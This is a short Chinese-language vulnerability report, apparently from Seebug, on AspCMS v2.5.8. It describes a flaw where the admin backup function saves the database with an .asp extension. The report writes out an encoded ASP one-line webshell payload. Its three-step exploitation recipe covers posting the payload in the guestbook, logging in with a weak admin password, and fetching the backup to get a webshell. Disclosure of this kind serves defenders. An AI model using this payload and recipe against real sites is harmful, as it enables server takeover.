### 简要描述:
aspcms后台的备份逻辑存在严重的逻辑问题,可导致一句话木马被“引入”执行
### 详细说明:
众所周知,对以xxx.asp命名的access数据库,只要插入著名的一句话:
┼攠數畣整爠煥敵瑳∨≡┩愾
访问该asp即可得到webshell
aspcmsv2.5.8 最新版虽然对正在使用的数据库的名字加了#号,导致无法直接访问,但是数据库的备份功能却是直接把数据备份成了 xxx.asp 导致访问备份的数据库网址即可得到webshell
利用过程:
1、在站点前台留言本以 " ┼攠數畣整爠煥敵瑳∨≡┩愾 "做标题留言一则
2、利用我刚提交的aspcms爆后台路径以及http://demo.aspcms.com/ 的弱口令,我轻易的进入了后台。
3、利用后台的备份功能备份数据库,得到存在一句话木马的web地址,得到webshell
[<img src="https://images.seebug.org/upload/201512/1600061730bc22156676ad83705433616c0d1a03.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1600061730bc22156676ad83705433616c0d1a03.png)
[<img src="https://images.seebug.org/upload/201512/1600063674e301bcdb98eee9236b34654be1942b.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1600063674e301bcdb98eee9236b34654be1942b.png)
### 漏洞证明:
得到webshell,请看图:
[<img src="https://images.seebug.org/upload/201512/16000702f05951fb5f127b07ae692b6c25a73d04.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/16000702f05951fb5f127b07ae692b6c25a73d04.png)
暂无评论